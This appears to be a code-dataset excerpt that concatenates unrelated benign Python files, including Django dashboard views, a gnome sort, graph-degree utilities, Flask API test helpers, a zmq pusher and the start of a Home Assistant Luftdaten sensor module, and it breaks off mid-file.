    validation.  The bound form is now re-rendered so validation errors are
    shown to the user.
    """
    template = "application_frontend/articles/create_articles.html"
    context = {}
    if request.method == "GET":
        if id is None:
            # Blank creation form, scoped to the requesting user.
            form = ArticleForm(user=request.user)
        else:
            # Pre-populate the form with the fields of the article being edited.
            # NOTE(review): unlike the creation branch, no ``user`` kwarg is
            # passed here — confirm ArticleForm tolerates its absence.
            article = Article.objects.get(id=id)
            initial = {
                "title": article.title,
                "author": article.author,
                "category": article.category,
                "body": article.body
            }
            form = ArticleForm(initial=initial)
        context["form"] = form
        return render(request, template, context=context)
    elif request.method == "POST":
        if id is None:
            form = ArticleForm(request.POST)
        else:
            # Bind the submission to the existing row so save() updates it.
            existing_article = Article.objects.get(id=id)
            form = ArticleForm(request.POST, instance=existing_article)
        if form.is_valid():
            article = form.save()
            # Redirect to the newly created/updated article:
            return redirect("full_article", slug=article.slug)
        # Invalid submission: show the form again together with its errors.
        context["form"] = form
        return render(request, template, context=context)
# Dashboard Views:
def render_dashboard_homepage(request):
    """Render the landing page listing the available data dashboards."""
    template = "application_frontend/data_dashboards/data_dashboard_layout.html"
    return render(request, template, context={})
def render_sipri_dashboard(request):
    """View that renders the homepage for the SIPRI Data Dashboards.

    Reads the bundled SIPRI "Total arms sales 2002-2020" workbook, builds an
    adjusted vs non-adjusted spending line chart with Plotly, and embeds the
    chart HTML into the template context.
    """
    # Context to be created:
    context={}
    # Querying the model object that contains urls to datasets:
    # NOTE(review): ``datasets`` is never used below — dead query, candidate for removal.
    datasets = SIPRIData.objects.first()
    # Loading the workbook data:
    total_arms_sale_sheet = load_workbook("application_frontend/static/application_frontend/data/Total-arms-sales-SIPRI-Top-100-2002-2020.xlsx")["Sheet1"]
    # Converting worksheet to pandas dataframe:
    # Row 4 holds the year labels; drop the first cell (row header).
    data_obj = total_arms_sale_sheet["A4:T4"][0]
    date_index = [data.value for data in data_obj][1:]
    # Extracting relevant sales data as a dict (rows 5 and 8 of the sheet):
    total_sales_dict = {
        "Spending Non-Adjusted": [data.value for data in total_arms_sale_sheet["B5:T5"][0]],
        "Spending Adjusted": [data.value for data in total_arms_sale_sheet["B8:T8"][0]]
    }
    total_sales_df = pd.DataFrame(total_sales_dict, index=date_index)
    # NOTE(review): the result of to_datetime is discarded, so this line has no effect.
    pd.to_datetime(total_sales_df.index)
    # Creating plotly graph object out of the dataframe:
    total_sales_fig = px.line(
        total_sales_df,
        x=total_sales_df.index,
        y=total_sales_df.columns
    )
    # Styling the figure and adding it to the context:
    total_sales_fig.update_traces(mode="markers+lines", hovertemplate="$%{y} Billion")
    total_sales_fig.update_layout(
        title="Total Arms Sales from 2002-2020",
        xaxis_title="Year",
        yaxis_title="Billion ($USD)",
        legend_title="Type of Spending",
        hovermode="x unified"
    )
    context["total_arms_sales_fig"] = total_sales_fig.to_html()
    # TODO: Add Dash application functionality for the Top 100 Arms Producing Company Data from 2002-2020 Dashboard.
    return render(request, "application_frontend/data_dashboards/sipri_dashboard.html", context=context)
# Korea Views:
def render_north_korea_homepage(request):
    """Render the North Korea section homepage."""
    template = "application_frontend/north_korea/north_korea_homepage_layout.html"
    return render(request, template, context={})
# Documentation Views:
def render_documentation_homepage(request):
    """Render the API documentation homepage."""
    template = "application_frontend/documentation/api_documentation_homepage.html"
    return render(request, template, context={})
def render_developer_documentation(request):
    """Render the developer documentation page."""
    template = "application_frontend/documentation/developer_documentation.html"
    return render(request, template, context={})
def render_about_page(request):
    """Render the about page."""
    template = "application_frontend/documentation/about_page.html"
    return render(request, template, context={})
def render_api_dashboard(request):
    """Render the API dashboard with a timeseries of Reddit posts ingested in the last 30 days."""
    context = {}
    # Querying all reddit posts created in the last month:
    prev_month = date.today() - timedelta(days=30)
    reddit_posts = RedditPosts.objects.filter(created_on__gt=prev_month)
    reddit_posts = reddit_posts.values_list("created_on")
    # Converting list of records to a dataframe to resample and create plotly graph:
    reddit_dataframe = pd.DataFrame.from_records(reddit_posts, columns=["created_on"])
    # Constant 1 per row so a daily resample-sum yields posts-per-day counts.
    reddit_dataframe["_count"] = 1
    reddit_dataframe.set_index(["created_on"], inplace=True)
    reddit_posts_resample = reddit_dataframe["_count"].squeeze().resample("D").sum()
    # Creating the plotly Timeseries graph for subreddit posts extracted per day:
    reddit_timeseries_fig = px.area(
        reddit_posts_resample,
        x=reddit_posts_resample.index,
        y=reddit_posts_resample
    )
    reddit_timeseries_fig.update_traces(mode="lines", hovertemplate="%{y} Posts on %{x}")
    reddit_timeseries_fig.update_layout(
        title="Reddit Posts Saved to the Database in the last Month",
        xaxis_title="Days",
        yaxis_title="Reddit Posts",
        xaxis=dict(showgrid=False),
        yaxis=dict(showgrid=False),
        plot_bgcolor="#0d1117"
    )
    context["reddit_posts_timeseries"] = reddit_timeseries_fig.to_html()
    return render(request, "application_frontend/documentation/api_dashboard.html", context=context)
1702848 | <reponame>m-payal/AlgorithmsAndDataStructure
"""
Title - Gnome Sort Algorithm
Pupose - Sorts a given array in ascending order.
Time Complexity - O(n^2)
"""
import random
class GnomeSort:
    """ GnomeSort Algorithm Implementation
    arr: an unordered list
    output: return list in ascending order
    Example:
    >>> sort = GnomeSort()
    Gnome Sort Algorithm is Initialized.
    >>> sort([2, 6, 3, 1, 9, 4])
    [1, 2, 3, 4, 6, 9]
    """

    def __init__(self):
        # Announcement kept: the class docstring's doctest depends on it.
        print("Gnome Sort Algorithm is Initialized.")

    def __call__(self, arr):
        """Sort *arr* in place in ascending order and return it.

        BUG FIX: the original incremented ``i`` past the end after the
        ``i == 0`` guard and then indexed ``arr[i]``, raising IndexError on
        any single-element list.  Merging the two conditions removes the
        out-of-bounds read.
        """
        i = 0
        while i < len(arr):
            if i == 0 or arr[i - 1] <= arr[i]:
                # In order (or at the left edge): step forward.
                i += 1
            else:
                # Out of order: swap and step back to re-check the pair.
                arr[i - 1], arr[i] = arr[i], arr[i - 1]
                i -= 1
        return arr
# Demo: sort a small literal list, then two random samples
# (the sampled runs produce non-deterministic output).
sort = GnomeSort()
print(sort([5, 2, 1, 6, 10])) # beginning example
# more populated examples
print(sort(random.sample(range(1, 101), 50)))
print(sort(random.sample(range(1, 201), 100)))
| StarcoderdataPython |
9779349 | #!/usr/bin/env python
import json
import os
from aws_cdk import core
from deploy.deploy_stack import DeployStack
# generated from local-deploy.sh
# Optional config written by local-deploy.sh; supplies a user-chosen stack name.
cfg = "deploy.json"
stackname = None
if os.path.exists(cfg):
    with open(cfg) as deploy_cfg:
        stackname = json.load(deploy_cfg)["stackname"]
# use user generated stackname or create one
if stackname is None:
    # Fallback: derive "<username>_<project>" from the home and working dirs.
    homedir = os.path.expanduser("~") # /home/<username>
    cwd = os.getcwd() # /my/path/to/projects
    owner = os.path.basename(os.path.normpath(homedir))
    project = os.path.basename(os.path.normpath(cwd))
    stackname = owner + "_" + project # username_project
# run it!
app = core.App()
DeployStack(app, stackname)
app.synth()
| StarcoderdataPython |
1788884 | <reponame>CarterWS/Summer2020<gh_stars>0
# https://github.com/micropython/micropython/blob/master/docs/pyboard/tutorial/timer.rst
import pyb
# Pyboard timer demo (runs on MicroPython hardware only).
# Phase 1: timer 4 at 10 Hz toggles LED 1 for ~2 s, then the callback is cleared.
tim = pyb.Timer(4)
tim.init(freq=10)
tim.callback(lambda t:pyb.LED(1).toggle())
pyb.delay(2000)
tim.callback(None)
# Phase 2: two timers at different rates toggle two LEDs concurrently for ~1 s.
tim4 = pyb.Timer(4, freq=10)
tim7 = pyb.Timer(7, freq=20)
tim4.callback(lambda t: pyb.LED(1).toggle())
tim7.callback(lambda t: pyb.LED(2).toggle())
pyb.delay(1000)
# Disarm both callbacks and leave the LEDs off.
tim4.callback(None)
tim7.callback(None)
pyb.LED(1).off()
pyb.LED(2).off()
255291 | <reponame>ungood/graupel-1<filename>processing/overlays.py
import cv2
import numpy as np
from collections import namedtuple
from matplotlib import pyplot as plt
from typing import Callable
Layout = namedtuple('Layout', ['x', 'y', 'width', 'height'])
class Overlay:
    """Axis-aligned rectangular region that can be blitted onto a larger image.

    ``layout`` gives the region's position and size; ``canvas`` holds the
    pixel data that :meth:`draw` copies into a target image.
    """

    def __new__(cls, layout: Layout):
        # NOTE(review): construction state is deliberately set in __new__ rather
        # than __init__ — subclasses (e.g. PlotOverlay) define their own
        # __init__ without calling super().__init__(), yet still rely on these
        # attributes being present.
        new = object.__new__(cls)
        new.layout = layout
        new.upper_left = (layout.x, layout.y)
        new.lower_right = (layout.x + layout.width, layout.y + layout.height)
        # Creates a blank canvas
        new.canvas = np.zeros((layout.height, layout.width, 1), dtype = "uint8")
        return new

    def draw(self, image):
        """Copy this overlay's canvas into *image* at the layout's rectangle.

        Rows span y..y+height, columns span x..x+width; *image* must be large
        enough and channel-compatible with ``canvas``.
        """
        image[self.upper_left[1]:self.lower_right[1],self.upper_left[0]:self.lower_right[0]] = self.canvas
class TextOverlay:
    """Placeholder for a future text-rendering overlay (not implemented yet)."""
    pass
class PlotOverlay(Overlay):
    """Overlay whose canvas is rendered from a matplotlib figure.

    Inherits position/canvas attributes from ``Overlay.__new__`` (note: this
    __init__ does not call super().__init__()).
    """

    def __init__(self, layout: Layout):
        # Setup a figure with the right size.
        in_per_pix = 1/plt.rcParams['figure.dpi']
        self.fig, self.ax = plt.subplots(tight_layout=True)
        #self.fig.set_size_inches(layout.width*in_per_pix, layout.height*in_per_pix)

    def update(self):
        """Re-render the matplotlib figure into ``self.canvas``.

        NOTE(review): the result is a 3-channel BGR image, while the base
        class initializes a 1-channel canvas — confirm ``Overlay.draw``
        targets a 3-channel image after the first update.
        """
        # redraw the canvas
        self.fig.canvas.draw()
        # convert canvas to image
        # NOTE(review): local ``bytes`` shadows the builtin of the same name.
        bytes = np.frombuffer(self.fig.canvas.tostring_rgb(), dtype=np.uint8)
        bytes = bytes.reshape(self.fig.canvas.get_width_height()[::-1] + (3,))
        bytes = cv2.resize(bytes, (self.layout.width, self.layout.height))
        # img is rgb, convert to opencv's default bgr
        self.canvas = cv2.cvtColor(bytes, cv2.COLOR_RGB2BGR)
5070868 | <filename>preprocessing/image_preprocessing/generate_img_lists.py<gh_stars>10-100
# -*- coding: utf-8 -*-
from __future__ import print_function
from __future__ import print_function
import argparse
import os
import pandas as pd
from sklearn.model_selection import train_test_split
import logging
logging.basicConfig(level=logging.DEBUG, format='[%(asctime)s] %(message)s', datefmt='%d/%m/%Y %H:%M:%S')
logger = logging.getLogger(__name__)
def file_exists(file):
    """Return ``True`` when *file* names an existing regular file."""
    return os.path.isfile(file)
def parse_args():
    """Build and evaluate the command-line interface for list generation."""
    cli = argparse.ArgumentParser("Generate lists indexing the Padchest dataset.")
    cli.add_argument("-r", "--root-dir", required=False, default="./", help="Root directory of the dataset.")
    cli.add_argument("-i", "--image-dir", required=False, default="Images", help="Directory (under --root-dir) containing the dataset images.")
    cli.add_argument("-s", "--splits", nargs='+', required=False, default=['train', 'val', 'test'], help="Splits to create.")
    cli.add_argument("-is", "--input-suffix", required=False, default="_list.txt", help="Suffix of the lists.")
    cli.add_argument("-od", "--output-dir", required=False, default='Annotations', help="Output directory.")
    cli.add_argument("-os", "--output-suffix", required=False, default='_list_images.txt', help="Output suffix for all splits.")
    cli.add_argument("-v", "--verbose", required=False, action='store_true', default=False, help="Be verbose")
    return cli.parse_args()
def generate_lists(root_dir, image_dir, input_suffix, output_dir, output_suffix, splits, verbose):
    """
    Generate per-split image-list files for an image dataset.

    For every split in *splits*, reads ``<root_dir>/<output_dir>/<split><input_suffix>``
    (one image filename per line) and writes ``<root_dir>/<output_dir>/<split><output_suffix>``
    where each line is the same filename prefixed with ``<image_dir>/``.

    :param root_dir: Root directory of the dataset.
    :param image_dir: Directory (under root_dir) containing the dataset images.
    :param input_suffix: Suffix of the input list files.
    :param output_dir: Directory (under root_dir) holding both input and output lists.
    :param output_suffix: Suffix for the generated output lists.
    :param splits: Splits to process, e.g. ['train', 'val', 'test'].
    :param verbose: Be verbose.
    """
    # BUG FIX: the original read the *global* ``args.verbose`` here, which only
    # exists when the module runs as a script; use the ``verbose`` parameter.
    if verbose:
        print('Listing all images from all data splits...')
    list_dir = os.path.join(root_dir, output_dir)
    for split in splits:
        in_path = os.path.join(list_dir, split + input_suffix)
        out_path = os.path.join(list_dir, split + output_suffix)
        if verbose:
            print('Writing on file', out_path)
        # Context managers replace the original's unclosed explicit handles.
        with open(in_path, 'r') as src, open(out_path, 'w') as dst:
            for line in src:
                name = line.strip('\n')
                # Forward slash kept on purpose: the lists are consumed as
                # relative POSIX-style paths, not OS-native paths.
                dst.write(image_dir + "/" + name + '\n')
    print('Done!')
if __name__ == "__main__":
    # Script entry point: parse CLI options and generate the per-split lists.
    args = parse_args()
    generate_lists(args.root_dir, args.image_dir, args.input_suffix, args.output_dir, args.output_suffix, args.splits, args.verbose)
| StarcoderdataPython |
1879140 | #!/usr/bin/python
# -*- coding: utf-8 -*-
from collections import OrderedDict
import re
import sys
# Python 2 only: force UTF-8 as the default string encoding.
reload(sys)
sys.setdefaultencoding("utf-8")
# The mapping file lists entries in groups of four lines:
# Cyrillic upper, Cyrillic lower, Latin upper, Latin lower.
# NOTE(review): this handle is never closed.
f = open("preprocess/iso9", 'rb')
lines = [line for line in f]
bigru = lines[::4]
smallru = lines[1::4]
bigen = lines[2::4]
smallen = lines[3::4]
# Cyrillic -> Latin lookup table, newline-stripped on both sides.
iso = OrderedDict()
for br, sr, be, se in zip(bigru, smallru, bigen, smallen):
    iso[br.replace("\n", "")] = be.replace("\n", "")
    iso[sr.replace("\n", "")] = se.replace("\n", "")
def rep(a):
    """Transliterate Cyrillic text *a* to Latin using the module-level ISO-9 table ``iso``.

    Python 2 code (``iteritems``); performs one ``replace`` pass per table entry.
    """
    #aa = a.decode('utf-8')
    aa = a
    for k,v in iso.iteritems():
        aa = aa.replace(k,v)
    #aa = aa.replace(k.decode('utf-8'),v.decode('utf-8'))
    #return aa.encode('utf-8')
    return aa
if __name__ == '__main__':
    # Transliterate the file named on the command line and write the result
    # next to it with an ".iso9" suffix.
    filename = sys.argv[1]
    rr = open(filename, 'rb')
    txt = rr.read()
    txt = rep(txt)
    ww = open(filename+".iso9", "w")
    ww.write(txt)
    rr.close()
    ww.close()
| StarcoderdataPython |
1752019 | <reponame>Toskgreg/GoldenLions<filename>tests/test_base.py
import json
from api import app, test_client
class TestBase():
    """
    Common helpers shared by the API test suites.

    Provides payload factories (``create_user_data`` / ``create_incident_data``)
    and thin wrappers around the Flask ``test_client`` for the auth and
    incident endpoints.

    FIXES: the mutable default arguments (``data=dict()``) in
    ``register_user`` and ``post_incident`` were replaced with ``None``
    sentinels, and the ``kwags`` typo was corrected to ``kwargs``.
    """

    def create_user_data(self, **kwargs):
        """Return a signup payload; any field can be overridden via keyword args."""
        return {
            'user_name': kwargs.get('user_name', 'bison'),
            'email': kwargs.get('email', '<EMAIL>'),
            'first_name': kwargs.get('first_name', 'bison'),
            'last_name': kwargs.get('last_name', 'lou'),
            'phone_number': kwargs.get('phone_number', '0753669897'),
            'password': kwargs.get('password', '<PASSWORD>'),
            'other_names': kwargs.get('other_names', ''),
            'is_admin': kwargs.get('is_admin', False)
        }

    def create_incident_data(self, **kwargs):
        """Return an incident payload; any field can be overridden via keyword args."""
        return {
            'title': kwargs.get('title', 'title'),
            'comment': kwargs.get('comment', 'title'),
            'latitude': kwargs.get('latitude', 0.0001),
            'longitude': kwargs.get('longitude', 0.0001),
            'type': kwargs.get('type', 'red-flag'),
            'status': kwargs.get('status', 'pending'),
            'images': kwargs.get('images', ['photo_0.jpg']),
            'videos': kwargs.get('videos', ['video_0002.mov'])
        }

    def register_user(self, data=None):
        """POST a signup request; *data* optionally overrides default user fields."""
        user = self.create_user_data(**(data or {}))
        return test_client.post(
            '/api/v1/auth/signup',
            content_type='application/json',
            data=json.dumps(user))

    def login_user(self, credentials):
        """Register the default user, then POST a login with *credentials*."""
        self.register_user()
        return test_client.post(
            '/api/v1/auth/login',
            content_type='application/json',
            data=json.dumps(credentials))

    def get_token(self, credentials):
        """Log in and return the access token from the response body."""
        response = self.login_user(credentials)
        message = json.loads(response.data)
        return message['data'][0]['access_token']

    def get_users(self, token):
        """GET the full user listing using a bearer *token*."""
        return test_client.get(
            '/api/v1/auth/users',
            headers={'Authorization': 'Bearer ' + token})

    def get_user(self, token):
        """GET the authenticated user's own record."""
        return test_client.get(
            '/api/v1/auth/user',
            headers={'Authorization': 'Bearer ' + token})

    def post_n_get_token(self, credentials):
        """Post one incident and return an access token for *credentials*."""
        token = self.get_token(credentials)
        self.post_incident(credentials)
        return token

    def post_incident(self, credentials, data=None):
        """POST an incident; *data* optionally overrides default incident fields."""
        incident = self.create_incident_data(**(data or {}))
        token = self.get_token(credentials)
        return test_client.post(
            '/api/v1/incidents',
            content_type='application/json',
            headers={'Authorization': 'Bearer ' + token},
            data=json.dumps(incident))

    def get_incidents(self, credentials, types):
        """Seed one incident, then GET the collection endpoint named *types*."""
        token = self.post_n_get_token(credentials)
        return test_client.get(
            '/api/v1/' + types,
            headers={'Authorization': 'Bearer ' + token})

    def get_totals(self, credentials):
        """Seed one incident, then GET the incident totals."""
        token = self.post_n_get_token(credentials)
        return test_client.get(
            '/api/v1/incidents/totals',
            headers={'Authorization': 'Bearer ' + token})

    def get_incident(self, credentials, incident_id):
        """Seed one incident, then GET the incident with *incident_id*."""
        token = self.post_n_get_token(credentials)
        return test_client.get(
            '/api/v1/incidents/' + incident_id,
            headers={'Authorization': 'Bearer ' + token})

    def patch_incident(self, credentials, incident_id, key):
        """Seed one incident, then PATCH field *key* of incident *incident_id*."""
        token = self.post_n_get_token(credentials)
        data = self.create_incident_data()
        return test_client.patch(
            '/api/v1/incidents/' + incident_id + '/' + key,
            content_type='application/json',
            headers={'Authorization': 'Bearer ' + token},
            data=json.dumps(data))

    def put_incident(self, credentials, incident_id):
        """Seed one incident, then PUT a full replacement for *incident_id*."""
        token = self.post_n_get_token(credentials)
        data = self.create_incident_data()
        return test_client.put(
            '/api/v1/incidents/' + incident_id,
            content_type='application/json',
            headers={'Authorization': 'Bearer ' + token},
            data=json.dumps(data))

    def delete_incident(self, credentials, incident_id):
        """Seed one incident, then DELETE incident *incident_id*."""
        token = self.post_n_get_token(credentials)
        return test_client.delete(
            '/api/v1/incidents/' + incident_id,
            headers={'Authorization': 'Bearer ' + token})

    def get_welcome(self):
        """GET the API root/welcome endpoint."""
        return test_client.get(
            '/')
| StarcoderdataPython |
12851781 | # -*- coding: utf-8 -*-
# Copyright (C) 2017-2019 by
# <NAME> <<EMAIL>>
# <NAME> <<EMAIL>>
# BSD license.
#
# Authors: <NAME> <<EMAIL>>
# <NAME> <<EMAIL>>
"""Assorted degree related graph utilities.
"""
import collections
from grinpy import degree, nodes, number_of_nodes
from grinpy.functions.neighborhoods import closed_neighborhood, neighborhood, set_neighborhood, set_closed_neighborhood
__all__ = [
"degree_sequence",
"min_degree",
"max_degree",
"average_degree",
"number_of_nodes_of_degree_k",
"number_of_degree_one_nodes",
"number_of_min_degree_nodes",
"number_of_max_degree_nodes",
"neighborhood_degree_list",
"closed_neighborhood_degree_list",
"is_regular",
"is_k_regular",
"is_sub_cubic",
"is_cubic",
]
def degree_sequence(G):
    """Return the degree sequence of G.

    The degree sequence is the list of node degrees, in node-iteration order.

    Parameters
    ----------
    G : NetworkX graph
        An undirected graph.

    Returns
    -------
    list
        The degree of every node of *G*.

    Examples
    --------
    >>> G = nx.path_graph(3) # Path on 3 nodes
    >>> nx.degree_sequence(G)
    [1, 2, 1]
    """
    sequence = []
    for node in nodes(G):
        sequence.append(degree(G, node))
    return sequence
def min_degree(G):
    """Return the minimum degree of G.

    The minimum degree of a graph is the smallest degree of any node in the
    graph.

    Parameters
    ----------
    G : NetworkX graph
        An undirected graph.

    Returns
    -------
    int
        The minimum degree of the graph.

    Examples
    --------
    >>> G = nx.path_graph(3) # Path on 3 nodes
    >>> nx.min_degree(G)
    1
    """
    # Idiom fix: min() replaces the original sort-then-index (O(n) vs O(n log n)).
    return min(degree_sequence(G))
def max_degree(G):
    """Return the maximum degree of G.

    The maximum degree of a graph is the largest degree of any node in the
    graph.

    Parameters
    ----------
    G : NetworkX graph
        An undirected graph.

    Returns
    -------
    int
        The maximum degree of the graph.

    Examples
    --------
    >>> G = nx.path_graph(3) # Path on 3 nodes
    >>> nx.max_degree(G)
    2
    """
    # Doc fix: the original example called nx.min_degree. Idiom fix: use max()
    # instead of reverse-sorting and indexing.
    return max(degree_sequence(G))
def average_degree(G):
    """Return the average degree of G.

    The average degree of a graph is the mean of the degrees of all nodes
    in the graph.

    Parameters
    ----------
    G : NetworkX graph
        An undirected graph.

    Returns
    -------
    float
        The average degree of the graph.

    Examples
    --------
    >>> G = nx.star_graph(3) # Star on 4 nodes
    >>> nx.average_degree(G)
    1.5
    """
    total = sum(degree_sequence(G))
    return total / number_of_nodes(G)
def number_of_nodes_of_degree_k(G, k):
    """Return the number of nodes of the graph with degree equal to k.

    Parameters
    ----------
    G : NetworkX graph
        An undirected graph.

    k : int
        A positive integer.

    Returns
    -------
    int
        The number of nodes in the graph with degree equal to k.

    Examples
    --------
    >>> G = nx.path_graph(3) # Path on 3 nodes
    >>> nx.number_of_nodes_of_degree_k(G, 1)
    2
    """
    count = 0
    for node in nodes(G):
        if degree(G, node) == k:
            count += 1
    return count
def number_of_degree_one_nodes(G):
    """Return the number of degree-1 nodes (leaves) of the graph.

    Parameters
    ----------
    G : NetworkX graph
        An undirected graph.

    Returns
    -------
    int
        The number of nodes in the graph with degree equal to 1.

    Examples
    --------
    >>> G = nx.path_graph(3) # Path on 3 nodes
    >>> nx.number_of_leaves(G)
    2
    """
    leaf_degree = 1
    return number_of_nodes_of_degree_k(G, leaf_degree)
def number_of_min_degree_nodes(G):
    """Return how many nodes attain the graph's minimum degree.

    Parameters
    ----------
    G : NetworkX graph
        An undirected graph.

    Returns
    -------
    int
        The number of nodes with degree equal to the minimum degree.

    Examples
    --------
    >>> G = nx.path_graph(3) # Path on 3 nodes
    >>> nx.number_of_min_degree_nodes(G)
    2
    """
    smallest = min_degree(G)
    return number_of_nodes_of_degree_k(G, smallest)
def number_of_max_degree_nodes(G):
    """Return how many nodes attain the graph's maximum degree.

    Parameters
    ----------
    G : NetworkX graph
        An undirected graph.

    Returns
    -------
    int
        The number of nodes with degree equal to the maximum degree.

    Examples
    --------
    >>> G = nx.path_graph(3) # Path on 3 nodes
    >>> nx.number_of_max_degree_nodes(G)
    1
    """
    largest = max_degree(G)
    return number_of_nodes_of_degree_k(G, largest)
def neighborhood_degree_list(G, nbunch):
    """Return a list of the unique degrees of all neighbors of nodes in
    `nbunch`.

    Parameters
    ----------
    G : NetworkX graph
        An undirected graph.

    nbunch :
        A single node or iterable container of nodes.

    Returns
    -------
    list
        A list of the degrees of all nodes in the neighborhood of the nodes
        in `nbunch`.

    Examples
    --------
    >>> import grinpy as gp
    >>> G = gp.path_graph(3) # Path on 3 nodes
    >>> gp.neighborhood_degree_list(G, 1)
    [1, 2]
    """
    # BUG FIX: the original tested ``isinstance(nodes, ...)`` — ``nodes`` is
    # the imported grinpy *function*, never an Iterable — so the set-based
    # branch was unreachable. The check must inspect ``nbunch``.
    if isinstance(nbunch, collections.abc.Iterable):
        return list(set(degree(G, u) for u in set_neighborhood(G, nbunch)))
    return list(set(degree(G, u) for u in neighborhood(G, nbunch)))
def closed_neighborhood_degree_list(G, nbunch):
    """Return a list of the unique degrees of all nodes in the closed
    neighborhood of the nodes in `nbunch`.

    Parameters
    ----------
    G : NetworkX graph
        An undirected graph.

    nbunch :
        A single node or iterable container of nodes.

    Returns
    -------
    list
        A list of the unique degrees of all nodes in the closed neighborhood
        of the nodes in `nbunch`.

    Examples
    --------
    >>> import grinpy as gp
    >>> G = gp.path_graph(3) # Path on 3 nodes
    >>> gp.closed_neighborhood_degree_list(G, 1)
    [1, 2]
    """
    # BUG FIX: as in neighborhood_degree_list, the original inspected the
    # imported function ``nodes`` instead of ``nbunch``. The docstring example
    # was also corrected: after set() deduplication the result cannot contain
    # the duplicate shown previously ([1, 2, 2]).
    if isinstance(nbunch, collections.abc.Iterable):
        return list(set(degree(G, u) for u in set_closed_neighborhood(G, nbunch)))
    return list(set(degree(G, u) for u in closed_neighborhood(G, nbunch)))
def is_regular(G):
    """Return True if every node of *G* has the same degree.

    Parameters
    ----------
    G : NetworkX graph
        An undirected graph

    Returns
    -------
    boolean
        True if regular, False otherwise.
    """
    # A graph is regular exactly when its degree extremes coincide.
    return max_degree(G) == min_degree(G)
def is_k_regular(G, k):
    """Return True if every node of *G* has degree exactly *k*.

    A graph is *regular of degree k* if all nodes have degree equal to *k*.

    Parameters
    ----------
    G : NetworkX graph
        An undirected graph

    k : int
        An integer

    Returns
    -------
    boolean
        True if all nodes have degree equal to *k*, False otherwise.

    Raises
    ------
    TypeError
        If *k* is not an integer-valued number.
    """
    # check that k is an integer
    if not float(k).is_integer():
        raise TypeError("Expected k to be an integer.")
    k = int(k)
    # Short-circuits on the first node whose degree differs, like the
    # original explicit loop.
    return all(degree(G, v) == k for v in nodes(G))
def is_sub_cubic(G):
    """Return True if *G* is sub-cubic, and False otherwise.

    A graph is *sub-cubic* if its maximum degree is at most 3.

    Parameters
    ----------
    G : NetworkX graph
        An undirected graph.

    Returns
    -------
    boolean
        True if *G* is sub-cubic, False otherwise.
    """
    largest_degree = max_degree(G)
    return largest_degree <= 3
def is_cubic(G):
    """Return True if *G* is cubic, and False otherwise.

    A graph is *cubic* if it is regular of degree 3.

    Parameters
    ----------
    G : NetworkX graph
        An undirected graph

    Returns
    -------
    boolean
        True if *G* is cubic, False otherwise.
    """
    # Cubic is just the k-regular check specialised to degree three.
    cubic_degree = 3
    return is_k_regular(G, cubic_degree)
| StarcoderdataPython |
6607764 | <reponame>timotheuslin/pyedid<filename>pyedid/main.py
"""
Entrypoint
"""
import sys
from pyedid.edid import Edid
from pyedid.helpers.edid_helper import EdidHelper
from pyedid.helpers.registry import Registry
def main():
    """Entry point: load the vendor registry and print every detected EDID."""
    xrandr_file = sys.argv[1] if len(sys.argv) > 1 else ''
    if xrandr_file in {'-?', '-h', '--help'}:
        print("Usage: pyedid [xrandr_file]")
        sys.exit(0)

    print("Loading registry from web...")
    vendor_registry = Registry.from_web()
    print("Done!\n")

    for raw_edid in EdidHelper.get_edids(xrandr_file):
        print(Edid(raw_edid, vendor_registry))


if __name__ == "__main__":
    main()
| StarcoderdataPython |
3489111 | from core.actions.base import Action
from core.actions.baseresolution import ActionResolution
class ActionStack(object):
    """
    An action stack keeping track of the action resolutions of a game object.
    """
    __slots__ = ["game", "game_object", "action_resolutions", "update_turn_callback"]

    def __init__(self, game, game_object, update_turn_callback=None):
        """
        :param game: The game the executor object belongs to.
        :param game_object: The executor game object
        :param update_turn_callback: The callback, if any, to update to next turn.
        """
        self.game = game
        self.game_object = game_object
        self.action_resolutions = []
        self.update_turn_callback = update_turn_callback

    def add_action_to_stack(self, action):
        """
        This will add an action to the stack if it needs resolution
        or execute it straight away if it doesn't.

        :param action: The action to be executed.
        :type action: Action
        """
        if not action.can_select(self.game_object):
            return
        if action.target_selection is not None:
            # Target selection pending: park a resolution on the stack.
            self.action_resolutions.append(
                ActionResolution(action, self.game_object, action.target_selection.copy(), self.game))
        else:
            # No targets needed: execute immediately.
            self._start_action(ActionResolution(action, self.game_object, None, self.game))
        self._notify_turn_update()

    def update(self):
        """
        This will update the resolution on the top of the stack.
        Once the selections and filters are resolved it executes an action.
        """
        if not self.action_resolutions:
            return
        current_resolution = self.action_resolutions[-1]
        current_resolution.update()
        if current_resolution.finished:
            self._start_action(current_resolution)
            self.action_resolutions.remove(current_resolution)
            if not self.action_resolutions:
                self._notify_turn_update()

    def _notify_turn_update(self):
        """Invoke the turn-update callback if one was provided.

        Bug fix: ``update_turn_callback`` defaults to None in ``__init__`` but
        was previously called unconditionally, raising TypeError for stacks
        constructed without a callback.
        """
        if self.update_turn_callback is not None:
            self.update_turn_callback()

    @staticmethod
    def _start_action(action_resolution):
        """
        Executes an action using the resolved targets.

        :param action_resolution: The ActionResolution to execute.
        :type action_resolution: ActionResolution
        """
        if action_resolution.can_execute_action():
            action_resolution.execute_action()
| StarcoderdataPython |
262873 | # zmq push example. Run the zmq_puller.py program for the client
import curio_zmq as zmq
async def pusher(address):
    """Bind a PUSH socket at *address*, send 100 numbered messages, then an
    exit sentinel so the puller knows to stop."""
    context = zmq.Context()
    push_socket = context.socket(zmq.PUSH)
    push_socket.bind(address)
    for message_number in range(100):
        await push_socket.send(b'Message %d' % message_number)
    await push_socket.send(b'exit')


if __name__ == '__main__':
    zmq.run(pusher, 'tcp://*:9000')
| StarcoderdataPython |
4945400 | <reponame>vtashev/local_luftdaten
"""
Support for Luftdaten sensors.
Copyright (c) 2019 <NAME>
Licensed under MIT. All rights reserved.
https://github.com/lichtteil/local_luftdaten/
"""
import logging
import asyncio
import json
from datetime import timedelta
import requests
import voluptuous as vol
from homeassistant.components.sensor import PLATFORM_SCHEMA
from homeassistant.const import (
CONF_NAME, CONF_RESOURCE, CONF_VERIFY_SSL, CONF_MONITORED_CONDITIONS,
TEMP_CELSIUS)
from homeassistant.helpers.entity import Entity
import homeassistant.helpers.config_validation as cv
# Module-level logger for this platform.
_LOGGER = logging.getLogger(__name__)

# Unit used for the particulate-matter readings.
VOLUME_MICROGRAMS_PER_CUBIC_METER = 'µg/m3'

# Sensor value_type keys as they appear in the device's JSON payload.
SENSOR_TEMPERATURE = 'BME280_temperature'
SENSOR_HUMIDITY = 'BME280_humidity'
SENSOR_PM1 = 'SDS_P1'
SENSOR_PM2 = 'SDS_P2'

# Map sensor key -> [friendly name, unit of measurement].
SENSOR_TYPES = {
